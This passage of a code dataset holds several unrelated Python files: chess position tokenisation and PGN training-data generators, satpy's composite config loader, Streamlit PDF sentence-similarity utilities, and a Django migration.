'3':np.array([0,0,0]),\n '4':np.array([0,0,0,0]),\n '5':np.array([0,0,0,0,0]),\n '6':np.array([0,0,0,0,0,0]),\n '7':np.array([0,0,0,0,0,0,0]),\n '8':np.array([0,0,0,0,0,0,0,0]),\n '/':np.array([]),\n}\n\ncastling2token = {\n 'KQkq':np.array([13,14,15,16]),\n 'Qkq':np.array([0,14,15,16]),\n 'Kkq':np.array([13,0,15,16]),\n 'KQq':np.array([13,14,0,16]),\n 'KQk':np.array([13,14,15,0]),\n 'KQ':np.array([13,14,0,0]),\n 'Kk':np.array([14,0,15,0]),\n 'Kq':np.array([13,0,0,16]),\n 'Qk':np.array([0,14,15,0]),\n 'Qq':np.array([0,14,0,16]),\n 'kq':np.array([0,0,15,16]),\n 'K':np.array([13,0,0,0]),\n 'Q':np.array([0,14,0,0]),\n 'k':np.array([0,0,15,0]),\n 'q':np.array([0,0,0,16]),\n '-':np.array([0,0,0,0]),\n}\n\ncolumn2token = {\n 'a':np.array([17]),\n 'b':np.array([18]),\n 'c':np.array([19]),\n 'd':np.array([20]),\n 'e':np.array([21]),\n 'f':np.array([22]),\n 'g':np.array([23]),\n 'h':np.array([24]),\n '-':np.array([0])\n}\n\ncolor2token = {\n 'w':np.array([25]),\n 'b':np.array([26])\n}\n\ndef elo2token(elo):\n if elo == -1: # no elo\n token = 27\n elif elo < 1500:\n token = 28\n elif elo>=2700:\n token = 39\n else:\n token = 28 + (elo-1500)//100\n return np.array([token])\n\n\n \ndef fen2token(fen, white_elo = -1, black_elo = -1, move_list = [], elo = True):\n token_listen = []\n liste1 = fen.split()\n\n for l in liste1[0]:\n #print(l,fen2token_dict[l])\n token_listen.append(fen2token_dict[l])\n \n token_listen.append(color2token[liste1[1]]) # Wer am Zug ist\n \n token_listen.append(castling2token[liste1[2]]) # Rochaderechte\n \n token_listen.append(column2token[liste1[3][0]]) # en passant column\n\n if elo:\n token_listen.append(elo2token(white_elo))\n token_listen.append(elo2token(black_elo))\n \n if move_list:\n for move in move_list:\n token_listen.append(np.array([move2label[move]+40]))\n\n # Außerdem gibt es noch Halbzüge seit Bauernzug/Schlagzug und Zug der Partie. Die lassen wir weg.\n \n tokens = np.concatenate(token_listen)\n tokens = tokens.reshape((1,-1))\n return tokens\n\nfen2vector_dict = {\n 'K':np.array([1,0,0,0,0,0,0,0,0,0,0,0]),\n 'k':np.array([0,1,0,0,0,0,0,0,0,0,0,0]),\n 'Q':np.array([0,0,1,0,0,0,0,0,0,0,0,0]),\n 'q':np.array([0,0,0,1,0,0,0,0,0,0,0,0]),\n 'B':np.array([0,0,0,0,1,0,0,0,0,0,0,0]),\n 'b':np.array([0,0,0,0,0,1,0,0,0,0,0,0]),\n 'N':np.array([0,0,0,0,0,0,1,0,0,0,0,0]),\n 'n':np.array([0,0,0,0,0,0,0,1,0,0,0,0]),\n 'R':np.array([0,0,0,0,0,0,0,0,1,0,0,0]),\n 'r':np.array([0,0,0,0,0,0,0,0,0,1,0,0]),\n 'P':np.array([0,0,0,0,0,0,0,0,0,0,1,0]),\n 'p':np.array([0,0,0,0,0,0,0,0,0,0,0,1]),\n '1':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*1),\n '2':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*2),\n '3':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*3),\n '4':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*4),\n '5':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*5),\n '6':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*6),\n '7':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*7),\n '8':np.array([0,0,0,0,0,0,0,0,0,0,0,0]*8),\n '/':np.array([]),\n}\n\ncastling2vector = {\n 'KQkq':np.array([1,1,1,1]),\n 'Qkq':np.array([0,1,1,1]),\n 'Kkq':np.array([1,0,1,1]),\n 'KQq':np.array([1,1,0,1]),\n 'KQk':np.array([1,1,1,0]),\n 'KQ':np.array([1,1,0,0]),\n 'Kk':np.array([1,0,1,0]),\n 'Kq':np.array([1,0,0,1]),\n 'Qk':np.array([0,1,1,0]),\n 'Qq':np.array([0,1,0,1]),\n 'kq':np.array([0,0,1,1]),\n 'K':np.array([1,0,0,0]),\n 'Q':np.array([0,1,0,0]),\n 'k':np.array([0,0,1,0]),\n 'q':np.array([0,0,0,1]),\n '-':np.array([0,0,0,0]),\n}\n\ncolumn2vector = {\n 'a':np.array([1,0,0,0,0,0,0,0]),\n 'b':np.array([0,1,0,0,0,0,0,0]),\n 'c':np.array([0,0,1,0,0,0,0,0]),\n 'd':np.array([0,0,0,1,0,0,0,0]),\n 'e':np.array([0,0,0,0,1,0,0,0]),\n 'f':np.array([0,0,0,0,0,1,0,0]),\n 'g':np.array([0,0,0,0,0,0,1,0]),\n 'h':np.array([0,0,0,0,0,0,0,1]),\n '-':np.array([0,0,0,0,0,0,0,0])\n}\n\ncolor2vector = {\n 'w':np.array([1,0]),\n 'b':np.array([0,1])\n}\n\ndef fen2vector(fen):\n vector_listen = []\n liste1 = fen.split()\n\n for l in liste1[0]:\n #print(l,fen2token_dict[l])\n vector_listen.append(fen2vector_dict[l])\n \n vector_listen.append(color2vector[liste1[1]]) # Wer am Zug ist\n \n vector_listen.append(castling2vector[liste1[2]]) # Rochaderechte\n \n vector_listen.append(column2vector[liste1[3][0]]) # en passant column\n \n # Außerdem gibt es noch Halbzüge seit Bauernzug/Schlagzug und Zug der Partie. Die lassen wir weg.\n \n vector = np.concatenate(vector_listen)\n vector = vector.reshape((1,-1)) # batch of one\n return vector\n\n\n\n\n\n\n# OLD VERSION:\n# validation_steps wird als Parameter an fit übergeben == total_validation_samples / batchsize \ndef validationdata(path, batchsize, bis_game_number, stepnumber=60000, target = 'legalmove', aws = False):\n \"\"\"\n targets können 'legalmove' sein, d.h. startfeld-zielfeld paare die tatsächlich auftreten können.\n 'outcome', d.h. sieg, niederlage, remis\n 'squarepairs', d.h. alle combinationen von start und zielfeld TODO\n 'startingsquare', d.h. nur das startfeld TODO\n \"\"\" \n #if aws: \n # from smart_open import open\n\n outcome_dict = {\n '1-0':np.array(0),\n '0-1':np.array(1),\n '1/2-1/2':np.array(2),\n }\n\n with open(path,encoding='latin-1') as database:\n print(chess.__version__,(chess.__version__ == '0.23.11'))\n current_game = ''\n batch = []\n labels = []\n count = 0\n step_count = 0\n while current_game != None:\n if count >= bis_game_number: # eternal loop\n database.seek(0)\n count = 0\n step_count = 0\n \n if step_count >= stepnumber: # eternal loop\n database.seek(0)\n count=0\n step_count = 0\n\n current_game = chess.pgn.read_game(database)\n board = current_game.board()\n count+=1\n\n if chess.__version__ == '0.23.11':\n current_game_moves = [move for move in current_game.main_line()]\n else:\n current_game_moves = [move for move in current_game.mainline_moves()]\n\n use_game = True\n if target == 'outcome':\n headers = current_game.headers\n if 'Result' in headers:\n if headers['Result'] in ['1/2-1/2','0-1','1-0']:\n outcome = outcome_dict[headers['Result']]\n else:\n use_game = False\n else:\n use_game = False\n\n if current_game_moves and '0000' not in current_game_moves and use_game:\n for move in current_game_moves:\n #print(move)\n fen = board.fen()\n tokens = fen2token(fen)\n batch.append(tokens)\n if target == 'legalmove':\n labels.append(move2label[move.uci()])\n elif target == 'outcome':\n labels.append(outcome)\n elif target == 'squarepairs':\n movestring = move.uci()\n startfeld_index = pure_square[movestring[:2]]\n zielfeld_index = pure_square[movestring[2:4]]\n label = np.zeros(64*64)\n label = label.reshape((64,64))\n label[startfeld_index,zielfeld_index] = 1.0\n label = label.reshape((64*64)) \n labels.append(label)\n\n board.push(move)\n step_count += 1\n \n if len(batch)==batchsize:\n batch_tensor = np.concatenate(batch)\n yield batch_tensor, np.array(labels)\n batch = []\n labels = []\n\n\n\n# OLD VERSION:\ndef trainingsdata(path, fraction, batchsize, from_game_number = 0, bis_game_number = 100000000, target = 'legalmove', aws = False):\n \"\"\"\n targets können 'legalmove' sein, d.h. startfeld-zielfeld paare die tatsächlich auftreten können.\n 'outcome', d.h. sieg, niederlage, remis\n 'squarepairs', d.h. alle combinationen von start und zielfeld TODO\n 'startingsquare', d.h. nur das startfeld TODO\n \"\"\"\n\n outcome_dict = {\n '1-0':np.array(0),\n '0-1':np.array(1),\n '1/2-1/2':np.array(2),\n }\n\n #if aws: \n # from smart_open import open\n\n with open(path,encoding='latin-1') as database:\n current_game = ''\n batch = []\n labels = []\n count = 0\n while True: \n # erstmal das erste game suchen, ohne parsen:\n #header = chess.pgn.read_headers(database)\n\n ## Skimming geht nicht auf der Colab python chess-version\n #while count < from_game_number:\n # count+=1\n # header = chess.pgn.read_headers(database)\n \n while current_game != None:\n #if count%1000 == 0:\n # print(count)\n \n current_game = chess.pgn.read_game(database)\n board = current_game.board()\n count+=1\n \n if from_game_number < count < bis_game_number:\n if chess.__version__ == '0.23.11':\n current_game_moves = [move for move in current_game.main_line()]\n else:\n current_game_moves = [move for move in current_game.mainline_moves()]\n current_game_movestrings = [move.uci() for move in current_game_moves]\n\n use_game = True\n if target == 'outcome':\n headers = current_game.headers\n if 'Result' in headers:\n if headers['Result'] in ['1/2-1/2','0-1','1-0']:\n outcome = outcome_dict[headers['Result']]\n else:\n use_game = False\n else:\n use_game = False\n\n\n if current_game_moves and '0000' not in current_game_movestrings and use_game:\n for move in current_game_moves:\n #print(move)\n rant = random.random()\n if rant < fraction:\n #print(\"Game no:\",count,rant)\n #print(board.fen())\n fen = board.fen()\n tokens = fen2token(fen)\n batch.append(tokens)\n if target == 'legalmove':\n labels.append(move2label[move.uci()])\n elif target == 'outcome':\n labels.append(outcome)\n elif target == 'squarepairs':\n movestring = move.uci()\n startfeld_index = pure_square[movestring[:2]]\n zielfeld_index = pure_square[movestring[2:4]]\n label = np.zeros(64*64)\n label = label.reshape((64,64))\n label[startfeld_index,zielfeld_index] = 1.0\n label = label.reshape((64*64)) \n labels.append(label)\n\n if len(batch)==batchsize:\n batch_tensor = np.concatenate(batch)\n yield batch_tensor, np.array(labels)\n batch = []\n labels = []\n board.push(move)\n \n #header = chess.pgn.read_headers(database)\n \n if count >= bis_game_number:\n current_game = None\n \n database.seek(0) # wieder von vorne\n count = 0\n\n\n\n\n\n\n\n\n\n\n\noutcome_dict = {\n '1-0':np.array(0),\n '0-1':np.array(1),\n '1/2-1/2':np.array(2),\n}\n\n# Encapsulation für bessere Lesbarkeit\ndef game_can_be_used(target,headers):\n if target == 'outcome':\n if 'Result' in headers:\n if headers['Result'] in ['1/2-1/2','0-1','1-0']:\n return True\n else:\n return False\n else:\n return False\n return True\n \n\ndef move_strings(current_game):\n if chess.__version__ == '0.23.11':\n current_game_moves = [move for move in current_game.main_line()]\n else:\n current_game_moves = [move for move in current_game.mainline_moves()]\n current_game_movestrings = [move.uci() for move in current_game_moves]\n return current_game_movestrings,current_game_moves\n\n\ndef get_elos(headers):\n white_elo = -1\n black_elo = -1\n \n if 'BlackElo' in headers:\n try:\n black_elo = int(headers['BlackElo'])\n except:\n pass\n\n if 'WhiteElo' in headers:\n try:\n white_elo = int(headers['WhiteElo'])\n except:\n pass\n \n return white_elo, black_elo\n\n\n# Current data generator\ndef data_generator(path, fraction, batchsize, pool_size = 1, from_game_number = 0, bis_game_number = 100000000, target = 'legalmove', elo = False, move_tokens = 0, validation = False):\n \"\"\"\n targets können 'legalmove' sein, d.h. startfeld-zielfeld paare die tatsächlich auftreten können.\n 'outcome', d.h. sieg, niederlage, remis\n 'squarepairs', d.h. alle combinationen von start und zielfeld\n 'startingsquare', d.h. nur das startfeld TODO\n \"\"\"\n #if aws: \n # from smart_open import open\n \n sample_label_pool = []\n\n with open(path,encoding='latin-1') as database:\n current_game = ''\n count = 0\n while True: \n while current_game != None:\n current_game = chess.pgn.read_game(database)\n if current_game == None:\n break\n\n board = current_game.board()\n count+=1\n\n use_game = game_can_be_used(target,current_game.headers)\n if target == 'outcome' and use_game:\n outcome = outcome_dict[current_game.headers['Result']]\n \n if not (from_game_number < count < bis_game_number):\n use_game = False\n \n current_game_moves = []\n current_game_movestrings = []\n if use_game:\n current_game_movestrings,current_game_moves = move_strings(current_game)\n \n if not (current_game_moves and '0000' not in current_game_movestrings and use_game):\n use_game = False\n \n if use_game:\n move_list = []\n for t in range(move_tokens):\n move_list.append('0000')\n \n for move in current_game_moves:\n rant = random.random()\n move_list.append(move.uci())\n if rant < fraction:\n\n white_elo, black_elo = -1,-1\n if elo:\n white_elo, black_elo = get_elos(current_game.headers)\n \n fen = board.fen()\n tokens = fen2token(fen, white_elo=white_elo, black_elo=black_elo, move_list=move_list[-1*(move_tokens+1):-1], elo=elo )\n \n \n if target == 'legalmove':\n label = move2label[move.uci()]\n elif target == 'outcome':\n label = outcome\n elif target == 'squarepairs':\n movestring = move.uci()\n startfeld_index = pure_square[movestring[:2]]\n zielfeld_index = pure_square[movestring[2:4]]\n label = np.zeros(64*64)\n label = label.reshape((64,64))\n label[startfeld_index,zielfeld_index] = 1.0\n label = label.reshape((64*64)) \n \n sample_label_pool.append((tokens,label))\n \n if len(sample_label_pool)==batchsize * pool_size:\n random.shuffle(sample_label_pool)\n batch = [t for (t,l) in sample_label_pool[:batchsize]]\n labels = [l for (t,l) in sample_label_pool[:batchsize]]\n batch_tensor = np.concatenate(batch)\n yield batch_tensor, np.array(labels)\n sample_label_pool = sample_label_pool[batchsize:] # besser in place\n \n board.push(move)\n\n if count >= bis_game_number:\n current_game = None\n if validation:\n return\n \n database.seek(0) # wieder von vorne\n current_game = ''\n count = 0 \n","sub_path":"chess_transformer_utils.py","file_name":"chess_transformer_utils.py","file_ext":"py","file_size_in_byte":20304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"135223462","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright (c) 2020 Satpy developers\n#\n# This file is part of satpy.\n#\n# satpy is free software: you can redistribute it and/or modify it under the\n# terms of the GNU General Public License as published by the Free Software\n# Foundation, either version 3 of the License, or (at your option) any later\n# version.\n#\n# satpy is distributed in the hope that it will be useful, but WITHOUT ANY\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR\n# A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along with\n# satpy. If not, see .\n\"\"\"Classes for loading compositor and modifier configuration files.\"\"\"\nimport os\nimport logging\nimport warnings\n\nimport yaml\ntry:\n from yaml import UnsafeLoader\nexcept ImportError:\n from yaml import Loader as UnsafeLoader\n\nfrom satpy import DatasetDict, DataQuery, DataID\nfrom satpy._config import (get_entry_points_config_dirs, config_search_paths,\n glob_config)\nfrom satpy.utils import recursive_dict_update\nfrom satpy.dataset.dataid import minimal_default_keys_config\n\nlogger = logging.getLogger(__name__)\n\n\ndef _convert_dep_info_to_data_query(dep_info):\n key_item = dep_info.copy()\n key_item.pop('prerequisites', None)\n key_item.pop('optional_prerequisites', None)\n if 'modifiers' in key_item:\n key_item['modifiers'] = tuple(key_item['modifiers'])\n key = DataQuery.from_dict(key_item)\n return key\n\n\nclass _CompositeConfigHelper:\n \"\"\"Helper class for parsing composite configurations.\n The provided `loaded_compositors` dictionary is updated inplace.\n \"\"\"\n\n def __init__(self, loaded_compositors, sensor_id_keys):\n self.loaded_compositors = loaded_compositors\n self.sensor_id_keys = sensor_id_keys\n\n def _create_comp_from_info(self, composite_info, loader):\n key = DataID(self.sensor_id_keys, **composite_info)\n comp = loader(_satpy_id=key, **composite_info)\n return key, comp\n\n def _handle_inline_comp_dep(self, dep_info, dep_num, parent_name):\n # Create an unique temporary name for the composite\n sub_comp_name = '_' + parent_name + '_dep_{}'.format(dep_num)\n dep_info['name'] = sub_comp_name\n self._load_config_composite(dep_info)\n\n @staticmethod\n def _get_compositor_loader_from_config(composite_name, composite_info):\n try:\n loader = composite_info.pop('compositor')\n except KeyError:\n raise ValueError(\"'compositor' key missing or empty for '{}'. Option keys = {}\".format(\n composite_name, str(composite_info.keys())))\n return loader\n\n def _process_composite_deps(self, composite_info):\n dep_num = -1\n for prereq_type in ['prerequisites', 'optional_prerequisites']:\n prereqs = []\n for dep_info in composite_info.get(prereq_type, []):\n dep_num += 1\n if not isinstance(dep_info, dict):\n prereqs.append(dep_info)\n continue\n elif 'compositor' in dep_info:\n self._handle_inline_comp_dep(\n dep_info, dep_num, composite_info['name'])\n prereq_key = _convert_dep_info_to_data_query(dep_info)\n prereqs.append(prereq_key)\n composite_info[prereq_type] = prereqs\n\n def _load_config_composite(self, composite_info):\n composite_name = composite_info['name']\n loader = self._get_compositor_loader_from_config(composite_name, composite_info)\n self._process_composite_deps(composite_info)\n key, comp = self._create_comp_from_info(composite_info, loader)\n self.loaded_compositors[key] = comp\n\n def _load_config_composites(self, configured_composites):\n for composite_name, composite_info in configured_composites.items():\n composite_info['name'] = composite_name\n self._load_config_composite(composite_info)\n\n def parse_config(self, configured_composites, composite_configs):\n \"\"\"Parse composite configuration dictionary.\"\"\"\n try:\n self._load_config_composites(configured_composites)\n except (ValueError, KeyError):\n raise RuntimeError(\"Failed to load composites from configs \"\n \"'{}'\".format(composite_configs))\n\n\nclass _ModifierConfigHelper:\n \"\"\"Helper class for parsing modifier configurations.\n The provided `loaded_modifiers` dictionary is updated inplace.\n \"\"\"\n\n def __init__(self, loaded_modifiers, sensor_id_keys):\n self.loaded_modifiers = loaded_modifiers\n self.sensor_id_keys = sensor_id_keys\n\n @staticmethod\n def _get_modifier_loader_from_config(modifier_name, modifier_info):\n try:\n loader = modifier_info.pop('modifier', None)\n if loader is None:\n loader = modifier_info.pop('compositor')\n warnings.warn(\"Modifier '{}' uses deprecated 'compositor' \"\n \"key to point to Python class, replace \"\n \"with 'modifier'.\".format(modifier_name))\n except KeyError:\n raise ValueError(\"'modifier' key missing or empty for '{}'. Option keys = {}\".format(\n modifier_name, str(modifier_info.keys())))\n return loader\n\n def _process_modifier_deps(self, modifier_info):\n for prereq_type in ['prerequisites', 'optional_prerequisites']:\n prereqs = []\n for dep_info in modifier_info.get(prereq_type, []):\n if not isinstance(dep_info, dict):\n prereqs.append(dep_info)\n continue\n prereq_key = _convert_dep_info_to_data_query(dep_info)\n prereqs.append(prereq_key)\n modifier_info[prereq_type] = prereqs\n\n def _load_config_modifier(self, modifier_info):\n modifier_name = modifier_info['name']\n loader = self._get_modifier_loader_from_config(modifier_name, modifier_info)\n self._process_modifier_deps(modifier_info)\n self.loaded_modifiers[modifier_name] = (loader, modifier_info)\n\n def _load_config_modifiers(self, configured_modifiers):\n for modifier_name, modifier_info in configured_modifiers.items():\n modifier_info['name'] = modifier_name\n self._load_config_modifier(modifier_info)\n\n def parse_config(self, configured_modifiers, composite_configs):\n \"\"\"Parse modifier configuration dictionary.\"\"\"\n try:\n self._load_config_modifiers(configured_modifiers)\n except (ValueError, KeyError):\n raise RuntimeError(\"Failed to load modifiers from configs \"\n \"'{}'\".format(composite_configs))\n\n\nclass CompositorLoader:\n \"\"\"Read compositors and modifiers using the configuration files on disk.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the compositor loader.\"\"\"\n self.modifiers = {}\n self.compositors = {}\n # sensor -> { dict of DataID key information }\n self._sensor_dataid_keys = {}\n\n @classmethod\n def all_composite_sensors(cls):\n \"\"\"Get all sensor names from available composite configs.\"\"\"\n paths = get_entry_points_config_dirs('satpy.composites')\n composite_configs = glob_config(\n os.path.join(\"composites\", \"*.yaml\"),\n search_dirs=paths)\n yaml_names = set([os.path.splitext(os.path.basename(fn))[0]\n for fn in composite_configs])\n non_sensor_yamls = ('visir',)\n sensor_names = [x for x in yaml_names if x not in non_sensor_yamls]\n return sensor_names\n\n def load_sensor_composites(self, sensor_name):\n \"\"\"Load all compositor configs for the provided sensor.\"\"\"\n config_filename = sensor_name + \".yaml\"\n logger.debug(\"Looking for composites config file %s\", config_filename)\n paths = get_entry_points_config_dirs('satpy.composites')\n composite_configs = config_search_paths(\n os.path.join(\"composites\", config_filename),\n search_dirs=paths, check_exists=True)\n if not composite_configs:\n logger.debug(\"No composite config found called %s\",\n config_filename)\n return\n self._load_config(composite_configs)\n\n def get_compositor(self, key, sensor_names):\n \"\"\"Get the compositor for *sensor_names*.\"\"\"\n for sensor_name in sensor_names:\n try:\n return self.compositors[sensor_name][key]\n except KeyError:\n continue\n raise KeyError(\"Could not find compositor '{}'\".format(key))\n\n def get_modifier(self, key, sensor_names):\n \"\"\"Get the modifier for *sensor_names*.\"\"\"\n for sensor_name in sensor_names:\n try:\n return self.modifiers[sensor_name][key]\n except KeyError:\n continue\n raise KeyError(\"Could not find modifier '{}'\".format(key))\n\n def load_compositors(self, sensor_names):\n \"\"\"Load all compositor configs for the provided sensors.\n Args:\n sensor_names (list of strings): Sensor names that have matching\n ``sensor_name.yaml`` config files.\n Returns:\n (comps, mods): Where `comps` is a dictionary:\n sensor_name -> composite ID -> compositor object\n And `mods` is a dictionary:\n sensor_name -> modifier name -> (modifier class,\n modifiers options)\n Note that these dictionaries are copies of those cached in\n this object.\n \"\"\"\n comps = {}\n mods = {}\n for sensor_name in sensor_names:\n if sensor_name not in self.compositors:\n self.load_sensor_composites(sensor_name)\n if sensor_name in self.compositors:\n comps[sensor_name] = DatasetDict(\n self.compositors[sensor_name].copy())\n mods[sensor_name] = self.modifiers[sensor_name].copy()\n return comps, mods\n\n def _get_sensor_id_keys(self, conf, sensor_id, sensor_deps):\n try:\n id_keys = conf['composite_identification_keys']\n except KeyError:\n try:\n id_keys = self._sensor_dataid_keys[sensor_deps[-1]]\n except IndexError:\n id_keys = minimal_default_keys_config\n self._sensor_dataid_keys[sensor_id] = id_keys\n return id_keys\n\n def _load_config(self, composite_configs):\n if not isinstance(composite_configs, (list, tuple)):\n composite_configs = [composite_configs]\n\n conf = {}\n for composite_config in composite_configs:\n with open(composite_config, 'r', encoding='utf-8') as conf_file:\n conf = recursive_dict_update(conf, yaml.load(conf_file, Loader=UnsafeLoader))\n try:\n sensor_name = conf['sensor_name']\n except KeyError:\n logger.debug('No \"sensor_name\" tag found in %s, skipping.',\n composite_configs)\n return\n\n sensor_id = sensor_name.split('/')[-1]\n sensor_deps = sensor_name.split('/')[:-1]\n\n compositors = self.compositors.setdefault(sensor_id, DatasetDict())\n modifiers = self.modifiers.setdefault(sensor_id, {})\n\n for sensor_dep in reversed(sensor_deps):\n if sensor_dep not in self.compositors or sensor_dep not in self.modifiers:\n self.load_sensor_composites(sensor_dep)\n\n if sensor_deps:\n compositors.update(self.compositors[sensor_deps[-1]])\n modifiers.update(self.modifiers[sensor_deps[-1]])\n\n id_keys = self._get_sensor_id_keys(conf, sensor_id, sensor_deps)\n mod_config_helper = _ModifierConfigHelper(modifiers, id_keys)\n configured_modifiers = conf.get('modifiers', {})\n mod_config_helper.parse_config(configured_modifiers, composite_configs)\n\n comp_config_helper = _CompositeConfigHelper(compositors, id_keys)\n configured_composites = conf.get('composites', {})\n comp_config_helper.parse_config(configured_composites, composite_configs)\n","sub_path":"config_loader.py","file_name":"config_loader.py","file_ext":"py","file_size_in_byte":12396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"565679093","text":"import re\nimport pdftotext\nimport streamlit as st\nimport pandas as pd\nfrom scipy.spatial.distance import cosine\nfrom snowballstemmer import EnglishStemmer # Use snowball stemming for turkish stemming\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nengStem = EnglishStemmer()\nall_stopwords = [] # Add stopwords if needed.\n\n\n@st.cache\ndef clean_pdf_page(page): # Cleans a pdftotext page\n \"\"\"Takes a long string represeting a page and returns the cleaned sentences\n \n Returns:\n list -- list of sentences\n \"\"\"\n return [re.sub(\"\\s+\", \" \", i.strip()) for i in page.split(\"\\n\")]\n\n\ndef read_pdf_file(file):\n \"\"\"Converts a file to a pdftotext object\n \n Arguments:\n file {file} -- PDF File\n \n Returns:\n pdftotext.PDF -- pdftotext representation of the file\n \"\"\"\n return pdftotext.PDF(file)\n\n\n@st.cache\ndef get_sections(pages):\n \"\"\"Get the different sections in a given page\n \n Arguments:\n pages {list} -- list of pages to extract sections from\n \n Returns:\n dict -- Dictionary containing the section names and their values\n \"\"\"\n sections = {}\n section_pages = {}\n current_section_name = None\n current_section = []\n\n for page_num, page in enumerate(pages):\n clean_page = [re.sub(\"\\s+\", \" \", i.strip()) for i in page.split(\"\\n\")]\n\n for ind, i in enumerate(clean_page):\n\n if (\n re.findall(\"^Section \\d+\", i)\n and \"page\" not in i\n or (re.sub(\"\\d+ [\\w+\\s+]+\", \"\", i) == \"\" and ind == 0 and len(i) > 6)\n ):\n if current_section_name is not None:\n sections[current_section_name] = current_section\n current_section = []\n current_section_name = i\n break\n\n section_pages[page_num + 1] = current_section_name or \"No Section\"\n\n current_section.extend(clean_page)\n return sections, section_pages\n\n\n@st.cache(allow_output_mutation=True, suppress_st_warning=True)\ndef calculate_distance(df1, df2):\n \"\"\"Calculate the cosine distance between all vectors in two dataframes\n \n Arguments:\n df1 {DataFrame} -- Dataframe of first set of features\n df2 {DataFrame} -- Dataframe of second set of features\n \n Returns:\n Dataframe -- Dataframe containing the distances between the vectors\n \"\"\"\n my_bar = st.progress(0)\n total_length = df1.shape[0] * df2.shape[0]\n incr = 0.0\n output = {}\n for ind in df1.index:\n output[ind] = {}\n for ind2 in df2.index:\n output[ind][ind2] = cosine(df1.loc[ind], df2.loc[ind2])\n incr += 1.0\n my_bar.progress(incr / total_length)\n\n return pd.DataFrame(output).dropna(how=\"all\").dropna(how=\"all\", axis=1)\n\n\n@st.cache\ndef get_similar_sentences(df_1, df_2):\n \"\"\"Using scikit-learn's count vectorizer, vectorize the two sets of text and find the best closest ones.\n \n Arguments:\n df_1['Sentance'] {list} -- list of first group of text\n df_2['Sentance'] {list} -- list of second group of text\n \n Returns:\n Dataframe -- Dataframe of all similar words and word pages between the two texts\n \"\"\"\n cv = CountVectorizer(stop_words=\"english\")\n\n cv.fit(pd.concat([df_1, df_2])[\"Sentance\"])\n\n df_1_feat = pd.DataFrame(\n cv.transform(df_1[\"Sentance\"]).toarray(), index=df_1[\"Sentance\"].index\n )\n df_2_feat = pd.DataFrame(\n cv.transform(df_2[\"Sentance\"]).toarray(), index=df_2[\"Sentance\"].index\n )\n\n score = calculate_distance(df_1_feat, df_2_feat)\n\n score_vals = score.min()\n mins = score_vals[score_vals < 0.5].index\n results = []\n for i, j in score.idxmin().loc[mins].items():\n results.append(\n (\n df_1[\"Sentance\"].loc[i],\n df_1[\"Page\"].loc[i],\n df_2[\"Sentance\"].loc[j],\n df_2[\"Page\"].loc[j],\n )\n )\n return pd.DataFrame(\n results,\n columns=[\"File 1 Sentance\", \"File 1 Page\", \"File 2 Sentance\", \"File 2 Page\"],\n )\n\n\n@st.cache\ndef clean_text(text):\n \"\"\"Clean a text by lowering the text, removing symbols and stopwords.\n \n Arguments:\n text {string} -- string to clean\n \n Returns:\n string -- cleaned string\n \"\"\"\n text = text.lower() # Convert the text to lower case\n text = re.sub(\",\", \" \", text) # Replace commas with an extra space\n\n text = re.sub(\"<.*?>\", \"\", text) # Clean out any HTML tags\n text = re.sub(\"\\s+\", \" \", text) # Replace multiple spaces with\n\n text = text.split()\n\n text = [\n re.sub(\"[^\\w]\", \"\", i.rstrip()) for i in text if i not in all_stopwords\n ] # Clean out stopwords\n\n # text = engStem.stemWords(text)# English Stemming\n\n text = \" \".join(text)\n return text\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"611981883","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('theEmpireAdmin', '0019_expedition_expedition_activities'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ExpeditionActivities',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('activity', models.CharField(max_length=70, null=True, blank=True)),\n ('expedition_icon', models.ImageField(null=True, upload_to=b'media/', blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='ProjectCategory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('category', models.CharField(max_length=50, null=True, blank=True)),\n ('project', models.ForeignKey(related_name='categories', to='theEmpireAdmin.Project')),\n ],\n ),\n migrations.RemoveField(\n model_name='expedition',\n name='expedition_activities',\n ),\n migrations.AlterField(\n model_name='expedition',\n name='cost',\n field=models.CharField(max_length=15, null=True, blank=True),\n ),\n migrations.AlterField(\n model_name='expedition',\n name='template_used',\n field=models.IntegerField(default=1, choices=[(1, b'template_1 (video in description template)'), (2, b'template_2 (video at bottom template'), (3, b'template_3 (video on landing template)')]),\n ),\n migrations.AddField(\n model_name='expeditionactivities',\n name='expedition',\n field=models.ForeignKey(related_name='activities', blank=True, to='theEmpireAdmin.Expedition', null=True),\n ),\n ]\n","sub_path":"theEmpireAdmin/migrations/0020_auto_20150615_0308.py","file_name":"0020_auto_20150615_0308.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
